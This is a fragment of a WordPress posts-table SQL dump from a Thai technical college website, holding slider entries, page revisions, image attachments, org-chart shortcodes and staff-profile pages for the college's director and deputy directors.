(617, 1, '2018-01-15 16:04:10', '2018-01-15 09:04:10', '', 'Slider 616 - image', '', 'publish', 'closed', 'closed', '', 'slider-616-image', '', '', '2018-01-16 15:14:13', '2018-01-16 08:14:13', '', 0, 'http://www.technicrayong.ac.th/?post_type=ml-slide&p=617', 1, 'ml-slide', '', 0),
(618, 1, '2018-01-15 16:04:10', '2018-01-15 09:04:10', '', 'Slider 616 - image', '', 'publish', 'closed', 'closed', '', 'slider-616-image-2', '', '', '2018-01-16 15:14:13', '2018-01-16 08:14:13', '', 0, 'http://www.technicrayong.ac.th/?post_type=ml-slide&p=618', 3, 'ml-slide', '', 0),
(619, 1, '2018-01-15 16:04:10', '2018-01-15 09:04:10', '', 'Slider 616 - image', '', 'publish', 'closed', 'closed', '', 'slider-616-image-3', '', '', '2018-01-16 15:14:13', '2018-01-16 08:14:13', '', 0, 'http://www.technicrayong.ac.th/?post_type=ml-slide&p=619', 0, 'ml-slide', '', 0),
(620, 1, '2018-01-15 16:04:10', '2018-01-15 09:04:10', '', 'Slider 616 - image', '', 'publish', 'closed', 'closed', '', 'slider-616-image-4', '', '', '2018-01-16 15:14:13', '2018-01-16 08:14:13', '', 0, 'http://www.technicrayong.ac.th/?post_type=ml-slide&p=620', 2, 'ml-slide', '', 0),
(623, 1, '2018-01-15 18:32:09', '2018-01-15 11:32:09', 'Thank you!', 'Confirm Subscription', '', 'publish', 'closed', 'closed', '', 'confirm-subscription', '', '', '2018-01-15 18:32:09', '2018-01-15 11:32:09', '', 0, 'http://www.technicrayong.ac.th/confirm-subscription/', 0, 'page', '', 0),
(628, 1, '2018-01-16 15:01:24', '2018-01-16 08:01:24', '', 'รับสมัคร', '', 'trash', 'closed', 'closed', '', 'new-slideshow-2__trashed', '', '', '2018-01-16 15:11:20', '2018-01-16 08:11:20', '', 0, 'http://www.technicrayong.ac.th/?post_type=ml-slider&p=628', 0, 'ml-slider', '', 0),
(629, 1, '2018-01-16 15:04:11', '2018-01-16 08:04:11', '', 'Call-To-Action', '', 'inherit', 'closed', 'closed', '', 'call-to-action', '', '', '2018-01-16 15:04:11', '2018-01-16 08:04:11', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/Call-To-Action.png', 0, 'attachment', 'image/png', 0),
(630, 1, '2018-01-16 15:04:22', '2018-01-16 08:04:22', '', 'Slider 628 - image', 'รับสมัครนักเรียน-นักศึกษาใหม่ ปีการศึกษา 2561', 'trash', 'closed', 'closed', '', 'slider-628-image__trashed', '', '', '2018-01-16 15:11:20', '2018-01-16 08:11:20', '', 0, 'http://www.technicrayong.ac.th/?post_type=ml-slide&p=630', 0, 'ml-slide', '', 0),
(631, 1, '2018-01-16 15:14:37', '2018-01-16 08:14:37', '', 'Call-To-Action', '', 'publish', 'closed', 'closed', '', 'new-slideshow-2', '', '', '2018-11-08 20:01:41', '2018-11-08 13:01:41', '', 0, 'http://www.technicrayong.ac.th/?post_type=ml-slider&p=631', 0, 'ml-slider', '', 0),
(632, 1, '2018-01-16 15:14:57', '2018-01-16 08:14:57', '', 'Slider 631 - image', 'รับสมัครนักเรียน-นักศึกษาใหม่ ปีการศึกษา 2561', 'publish', 'closed', 'closed', '', 'slider-631-image', '', '', '2018-11-08 20:01:41', '2018-11-08 13:01:41', '', 0, 'http://www.technicrayong.ac.th/?post_type=ml-slide&p=632', 0, 'ml-slide', '', 0),
(637, 1, '2018-01-18 16:48:50', '2018-01-18 09:48:50', '<h4><a href=\"/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n<a href=\"/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a></h4>\r\n<strong><span style=\"color: #0000ff;\">มีปัญหาในการสมัครออนไลน์ โทร 094-5166653\r\n</span></strong>\r\n\r\n<strong><span style=\"color: #0000ff;\">นักเรียน/นักศึกษาโควตา\r\nปีการศึกษา 2561.\r\nให้กรอกข้อมูลผ่านระบบออนไลน์. และพิมพ์ใบสมัครมาใช้ประกอบการมอบตัวตามวันเวลาที่กำหนด.\r\n</span></strong>\r\n\r\n \r\n\r\n<img class=\"aligncenter size-large wp-image-294\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-01-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-293\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-02-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-292\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-03-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', ' ', 'inherit', 'closed', 'closed', '', '287-revision-v1', '', '', '2018-01-18 16:48:50', '2018-01-18 09:48:50', '', 287, 'http://www.technicrayong.ac.th/287-revision-v1/', 0, 'revision', '', 0),
(639, 1, '2018-01-18 18:21:38', '2018-01-18 11:21:38', '', 'yuttana', '', 'inherit', 'closed', 'closed', '', 'yuttana', '', '', '2018-11-02 16:43:07', '2018-11-02 09:43:07', '', 2046, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/yuttana.jpg', 0, 'attachment', 'image/jpeg', 0),
(640, 1, '2018-01-18 18:21:40', '2018-01-18 11:21:40', '', 'kittipong', '', 'inherit', 'closed', 'closed', '', 'kittipong', '', '', '2018-01-18 18:21:40', '2018-01-18 11:21:40', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/kittipong.jpg', 0, 'attachment', 'image/jpeg', 0),
(641, 1, '2018-01-18 18:21:41', '2018-01-18 11:21:41', '', 'nuttaree', '', 'inherit', 'closed', 'closed', '', 'nuttaree', '', '', '2018-01-18 18:21:41', '2018-01-18 11:21:41', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/nuttaree.jpg', 0, 'attachment', 'image/jpeg', 0),
(642, 1, '2018-01-18 18:21:41', '2018-01-18 11:21:41', '', 'sawai', '', 'inherit', 'closed', 'closed', '', 'sawai', '', '', '2018-01-18 18:21:41', '2018-01-18 11:21:41', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/sawai.jpg', 0, 'attachment', 'image/jpeg', 0),
(643, 1, '2018-01-18 18:24:14', '2018-01-18 11:24:14', '<a href=\"/%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84/%e0%b8%9c%e0%b8%ad/\"><img class=\" wp-image-12158 aligncenter\" src=\"/wp-content/uploads/2018/01/ผอ..jpg\" alt=\"\" width=\"400\" height=\"534\" /></a>', 'ผู้อำนวยการวิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84', '', '', '2021-11-08 10:16:50', '2021-11-08 03:16:50', '', 0, 'http://www.technicrayong.ac.th/?p=643', 478, 'post', '', 0),
(644, 1, '2018-01-18 18:24:14', '2018-01-18 11:24:14', '<a href=\"/wp-content/uploads/2018/01/sawai.jpg\"><img class=\"aligncenter size-full wp-image-642\" src=\"/wp-content/uploads/2018/01/sawai.jpg\" alt=\"\" width=\"324\" height=\"400\" /></a>\r\n<h3 style=\"text-align: center;\">นายไสว สีบูจันดี\r\nผู้อำนวยการวิทยาลัยเทคนิคระยอง</h3>', 'ผู้อำนวยการวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '643-revision-v1', '', '', '2018-01-18 18:24:14', '2018-01-18 11:24:14', '', 643, 'http://www.technicrayong.ac.th/643-revision-v1/', 0, 'revision', '', 0),
(645, 1, '2018-01-18 18:26:58', '2018-01-18 11:26:58', '<p style=\"text-align: center;\"><a href=\"/%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab/%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%8a%e0%b8%b2%e0%b8%84%e0%b8%a3%e0%b8%b4%e0%b8%95/\"><img class=\"alignnone wp-image-12164\" src=\"/wp-content/uploads/2018/01/รองชาคริต.jpg\" alt=\"\" width=\"399\" height=\"533\" /></a></p>', 'รองผู้อำนวยการฝ่ายบริหารทรัพยากร', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab', '', '', '2021-11-08 10:20:25', '2021-11-08 03:20:25', '', 0, 'http://www.technicrayong.ac.th/?p=645', 480, 'post', '', 0),
(646, 1, '2018-01-18 18:26:58', '2018-01-18 11:26:58', '<a href=\"/wp-content/uploads/2018/01/nuttaree.jpg\"><img class=\"aligncenter size-full wp-image-641\" src=\"/wp-content/uploads/2018/01/nuttaree.jpg\" alt=\"\" width=\"324\" height=\"400\" /></a>\r\n<h3 style=\"text-align: center;\">นางณัฐธารีย์ สิริกุลปัญญาพร\r\nรองผู้อำนวยการฝ่ายวิชาการ</h3>', 'รองผู้อำนวยการฝ่ายวิชาการ', '', 'inherit', 'closed', 'closed', '', '645-revision-v1', '', '', '2018-01-18 18:26:58', '2018-01-18 11:26:58', '', 645, 'http://www.technicrayong.ac.th/645-revision-v1/', 0, 'revision', '', 0),
(647, 1, '2018-01-18 18:29:16', '2018-01-18 11:29:16', '<p style=\"text-align: center;\"><a href=\"/%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab/%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%88%e0%b8%b4%e0%b9%8b%e0%b8%87/\"><img class=\"alignnone wp-image-12161\" src=\"/wp-content/uploads/2018/01/รองจิ๋ง.jpg\" alt=\"\" width=\"366\" height=\"489\" /></a></p>', 'รองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99', '', '', '2021-11-08 10:21:54', '2021-11-08 03:21:54', '', 0, 'http://www.technicrayong.ac.th/?p=647', 484, 'post', '', 0),
(648, 1, '2018-01-18 18:29:16', '2018-01-18 11:29:16', '<a href=\"/wp-content/uploads/2018/01/yuttana.jpg\"><img class=\"aligncenter size-full wp-image-639\" src=\"/wp-content/uploads/2018/01/yuttana.jpg\" alt=\"\" width=\"324\" height=\"400\" /></a>\r\n<h3 style=\"text-align: center;\">นายยุทธนา อ่อนส้มกฤษ\r\nรองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา</h3>', 'รองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '647-revision-v1', '', '', '2018-01-18 18:29:16', '2018-01-18 11:29:16', '', 647, 'http://www.technicrayong.ac.th/647-revision-v1/', 0, 'revision', '', 0),
(649, 1, '2018-01-18 18:31:03', '2018-01-18 11:31:03', '<p style=\"text-align: center;\"><a href=\"/%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2/%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%ad%e0%b8%b2/\"><img class=\"alignnone wp-image-12154\" src=\"/wp-content/uploads/2018/01/รองอา.jpg\" alt=\"\" width=\"407\" height=\"543\" /></a></p>', 'รองผู้อำนวยการฝ่ายวิชาการ', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2', '', '', '2021-11-08 10:08:36', '2021-11-08 03:08:36', '', 0, 'http://www.technicrayong.ac.th/?p=649', 482, 'post', '', 0),
(650, 1, '2018-01-18 18:31:03', '2018-01-18 11:31:03', '<a href=\"/wp-content/uploads/2018/01/kittipong.jpg\"><img class=\"aligncenter size-full wp-image-640\" src=\"/wp-content/uploads/2018/01/kittipong.jpg\" alt=\"\" width=\"324\" height=\"400\" /></a>\r\n<h3 style=\"text-align: center;\">นายกิตติพงค์ อุตตมะเวทิน\r\nรองผู้อำนวยการฝ่ายบริหารทรัพยากร</h3>', 'รองผู้อำนวยการฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '649-revision-v1', '', '', '2018-01-18 18:31:03', '2018-01-18 11:31:03', '', 649, 'http://www.technicrayong.ac.th/649-revision-v1/', 0, 'revision', '', 0),
(656, 1, '2018-01-19 12:54:41', '2018-01-19 05:54:41', '<img class=\"aligncenter size-full wp-image-1819\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-15-49.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1820\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-16-13-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1821\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-20-16.jpg\" alt=\"\" width=\"198\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1822\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-16-38-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1823 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-27-30.jpg\" alt=\"\" width=\"468\" height=\"315\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1824\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-43-40.jpg\" alt=\"\" width=\"197\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1825\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-28-10-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1826 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-39-21.jpg\" alt=\"\" width=\"394\" height=\"316\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1827\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-43-36.jpg\" alt=\"\" width=\"194\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1828\" src=\"/wp-content/uploads/2018/03/14-3-2561-9-39-44-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1829 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-23-43.jpg\" alt=\"\" width=\"586\" height=\"624\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1830\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-27-29.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1831\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-25-14-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1832 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-34-37.jpg\" alt=\"\" width=\"433\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1833\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-38-35.jpg\" alt=\"\" width=\"193\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1834\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-35-45-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1835 size-full\" src=\"/wp-content/uploads/2018/03/14-3-2561-13-40-22.jpg\" alt=\"\" width=\"256\" height=\"321\" />', 'โครงสร้างฝ่ายวิชาการ', '', 'publish', 'closed', 'closed', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-03-14 13:59:38', '2018-03-14 06:59:38', '', 0, 'http://www.technicrayong.ac.th/?page_id=656', 0, 'page', '', 0),
(657, 1, '2018-01-19 12:54:41', '2018-01-19 05:54:41', 'ฟหกดส่ฟหก\r\n\r\nฟ่ก้ดวส่า\r\n\r\nสวฟ่หกดวส', 'ฝ่ายวิชาการ', '', 'inherit', 'closed', 'closed', '', '656-revision-v1', '', '', '2018-01-19 12:54:41', '2018-01-19 05:54:41', '', 656, 'http://www.technicrayong.ac.th/656-revision-v1/', 0, 'revision', '', 0),
(658, 1, '2018-01-19 12:55:08', '2018-01-19 05:55:08', 'ฟหกดส่ฟหก\r\n\r\nฟ่ก้ดวส่า\r\n\r\nสวฟ่หกดวส', 'โครงสร้างฝ่ายวิชาการ', '', 'inherit', 'closed', 'closed', '', '656-revision-v1', '', '', '2018-01-19 12:55:08', '2018-01-19 05:55:08', '', 656, 'http://www.technicrayong.ac.th/656-revision-v1/', 0, 'revision', '', 0),
(659, 1, '2018-01-19 12:58:57', '2018-01-19 05:58:57', '', 'งานบุคลากร', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2022-04-29 12:30:32', '2022-04-29 05:30:32', '', 0, 'http://www.technicrayong.ac.th/?p=659', 27, 'nav_menu_item', '', 0),
(661, 3, '2018-01-19 13:05:02', '2018-01-19 06:05:02', ' ', '', '', 'publish', 'closed', 'closed', '', '661', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://www.technicrayong.ac.th/?p=661', 53, 'nav_menu_item', '', 0),
(662, 3, '2018-01-19 14:25:44', '2018-01-19 07:25:44', '<img class=\"alignleft wp-image-693 size-full\" src=\"/wp-content/uploads/2018/01/19-1-2561-15-53-35.jpg\" alt=\"\" width=\"1083\" height=\"757\" />\r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'publish', 'closed', 'closed', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81', '', '', '2018-01-19 15:50:54', '2018-01-19 08:50:54', '', 0, 'http://www.technicrayong.ac.th/?page_id=662', 0, 'page', '', 0),
(664, 1, '2018-01-19 13:18:26', '2018-01-19 06:18:26', '\n#main-slider::before {\nbackground: none;\n}\n\n#main-slider::after {\nbackground: none;\n}\n', 'university-hub-pro', '', 'inherit', 'closed', 'closed', '', '380-revision-v1', '', '', '2018-01-19 13:18:26', '2018-01-19 06:18:26', '', 380, 'http://www.technicrayong.ac.th/380-revision-v1/', 0, 'revision', '', 0),
(667, 1, '2018-01-19 13:35:41', '2018-01-19 06:35:41', '', 'โครงสร้างการบริหาร', '', 'publish', 'closed', 'closed', '', '667', '', '', '2018-01-19 13:42:31', '2018-01-19 06:42:31', '', 0, 'http://www.technicrayong.ac.th/?post_type=e_org_chart_ps&p=667', 0, 'e_org_chart_ps', '', 0),
(668, 1, '2018-01-19 13:39:41', '2018-01-19 06:39:41', '[e_org_chart_ps name=\"%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3\"]', 'โครงสร้างฝ่ายวิชาการ', '', 'inherit', 'closed', 'closed', '', '656-revision-v1', '', '', '2018-01-19 13:39:41', '2018-01-19 06:39:41', '', 656, 'http://www.technicrayong.ac.th/656-revision-v1/', 0, 'revision', '', 0),
(669, 1, '2018-01-19 13:43:59', '2018-01-19 06:43:59', '<p style=\"text-align: center;\">[e_org_chart_ps name=\"%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3\"]</p>', 'โครงสร้างฝ่ายวิชาการ', '', 'inherit', 'closed', 'closed', '', '656-revision-v1', '', '', '2018-01-19 13:43:59', '2018-01-19 06:43:59', '', 656, 'http://www.technicrayong.ac.th/656-revision-v1/', 0, 'revision', '', 0),
(670, 1, '2018-01-19 13:46:03', '2018-01-19 06:46:03', '', 'โครงสร้างฝ่ายวิชาการ', '', 'inherit', 'closed', 'closed', '', '656-revision-v1', '', '', '2018-01-19 13:46:03', '2018-01-19 06:46:03', '', 656, 'http://www.technicrayong.ac.th/656-revision-v1/', 0, 'revision', '', 0),
(671, 1, '2018-01-19 13:46:31', '2018-01-19 06:46:31', '', 'S__21389369', '', 'inherit', 'closed', 'closed', '', 's__21389369', '', '', '2018-01-19 13:47:07', '2018-01-19 06:47:07', '', 643, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/S__21389369.jpg', 0, 'attachment', 'image/jpeg', 0),
(673, 1, '2018-01-19 13:47:54', '2018-01-19 06:47:54', '<a href=\"/wp-content/uploads/2018/01/S__21389369.jpg\"><img class=\"aligncenter size-large wp-image-671\" src=\"/wp-content/uploads/2018/01/S__21389369-749x1024.jpg\" alt=\"\" width=\"324\" height=\"400\" /></a>\n<h3 style=\"text-align: center;\">นายไสว สีบูจันดี\nผู้อำนวยการวิทยาลัยเทคนิคระยอง</h3>', 'ผู้อำนวยการวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '643-autosave-v1', '', '', '2018-01-19 13:47:54', '2018-01-19 06:47:54', '', 643, 'http://www.technicrayong.ac.th/643-autosave-v1/', 0, 'revision', '', 0),
(674, 1, '2018-01-19 13:48:53', '2018-01-19 06:48:53', '<a href=\"/wp-content/uploads/2018/01/S__21389369.jpg\"><img class=\"aligncenter size-large wp-image-671\" src=\"/wp-content/uploads/2018/01/S__21389369-749x1024.jpg\" alt=\"\" width=\"324\" height=\"400\" /></a>\r\n<h3 style=\"text-align: center;\">นายไสว สีบูจันดี\r\nผู้อำนวยการวิทยาลัยเทคนิคระยอง</h3>', 'ผู้อำนวยการวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '643-revision-v1', '', '', '2018-01-19 13:48:53', '2018-01-19 06:48:53', '', 643, 'http://www.technicrayong.ac.th/643-revision-v1/', 0, 'revision', '', 0),
(687, 3, '2018-01-19 14:15:54', '2018-01-19 07:15:54', '', 'ฝ่ายบริหารทรัพยากร', '', 'publish', 'closed', 'closed', '', '%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%a3%e0%b8%b1%e0%b8%9e%e0%b8%a2%e0%b8%b2%e0%b8%81%e0%b8%a3', '', '', '2018-01-19 14:15:54', '2018-01-19 07:15:54', '', 0, 'http://www.technicrayong.ac.th/?post_type=e_org_chart_ps&p=687', 0, 'e_org_chart_ps', '', 0),
(689, 3, '2018-01-19 14:22:26', '2018-01-19 07:22:26', '[e_org_chart_ps name=\"%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%a3%e0%b8%b1%e0%b8%9e%e0%b8%a2%e0%b8%b2%e0%b8%81%e0%b8%a3\"]', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '160-revision-v1', '', '', '2018-01-19 14:22:26', '2018-01-19 07:22:26', '', 160, 'http://www.technicrayong.ac.th/160-revision-v1/', 0, 'revision', '', 0),
(690, 1, '2018-01-19 14:24:48', '2018-01-19 07:24:48', '[e_org_chart_ps name=\"%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%a3%e0%b8%b1%e0%b8%9e%e0%b8%a2%e0%b8%b2%e0%b8%81%e0%b8%a3\"]', '', '', 'inherit', 'closed', 'closed', '', '160-revision-v1', '', '', '2018-01-19 14:24:48', '2018-01-19 07:24:48', '', 160, 'http://www.technicrayong.ac.th/160-revision-v1/', 0, 'revision', '', 0),
(691, 1, '2018-01-19 14:25:20', '2018-01-19 07:25:20', ' ', '', '', 'inherit', 'closed', 'closed', '', '160-revision-v1', '', '', '2018-01-19 14:25:20', '2018-01-19 07:25:20', '', 160, 'http://www.technicrayong.ac.th/160-revision-v1/', 0, 'revision', '', 0),
(692, 3, '2018-01-19 14:25:44', '2018-01-19 07:25:44', '[e_org_chart_ps name=\"%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%a3%e0%b8%b1%e0%b8%9e%e0%b8%a2%e0%b8%b2%e0%b8%81%e0%b8%a3\"]\r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '662-revision-v1', '', '', '2018-01-19 14:25:44', '2018-01-19 07:25:44', '', 662, 'http://www.technicrayong.ac.th/662-revision-v1/', 0, 'revision', '', 0),
(694, 3, '2018-01-19 15:50:33', '2018-01-19 08:50:33', '<img class=\"aligncenter wp-image-693\" src=\"/wp-content/uploads/2018/01/19-1-2561-15-53-35-300x210.jpg\" alt=\"\" width=\"538\" height=\"377\" />\n\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '662-autosave-v1', '', '', '2018-01-19 15:50:33', '2018-01-19 08:50:33', '', 662, 'http://www.technicrayong.ac.th/662-autosave-v1/', 0, 'revision', '', 0),
(695, 3, '2018-01-19 15:50:54', '2018-01-19 08:50:54', '<img class=\"alignleft wp-image-693 size-full\" src=\"/wp-content/uploads/2018/01/19-1-2561-15-53-35.jpg\" alt=\"\" width=\"1083\" height=\"757\" />\r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '662-revision-v1', '', '', '2018-01-19 15:50:54', '2018-01-19 08:50:54', '', 662, 'http://www.technicrayong.ac.th/662-revision-v1/', 0, 'revision', '', 0),
